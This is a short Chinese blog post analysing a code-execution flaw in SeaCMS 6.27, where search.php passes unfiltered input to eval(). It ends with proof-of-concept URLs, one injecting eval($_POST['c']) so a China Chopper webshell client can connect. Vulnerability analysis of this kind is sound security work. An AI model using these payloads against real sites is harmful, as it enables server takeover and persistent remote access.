Seacms6.27代码执行分析

分析

首先利用代码审计工具打开网站目录,尝试搜索能够执行代码的函数。首先想到的是eval,实际上该cms的代码执行漏洞正好是eval发起的。
搜索到包含该函数的信息很多,主要关注的是include/main.class.php里的如下区域:
在这里插入图片描述
引用该文件的页面是搜索页面
在这里插入图片描述

在每个 eval() 上面都加一句输出,看看传进来的参数的变化。
在这里插入图片描述
根据输出的结果来看,此处并没有任何过滤,因此接下来的 eval 将会执行代码。

在这里插入图片描述
所以Poc

http://127.0.0.1/search.php?searchtype=5&tid=0&yuyan=代码

菜刀连接的Poc :

http://127.0.0.1/search.php?searchtype=5&tid=0&yuyan=eval($_POST['c'])
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值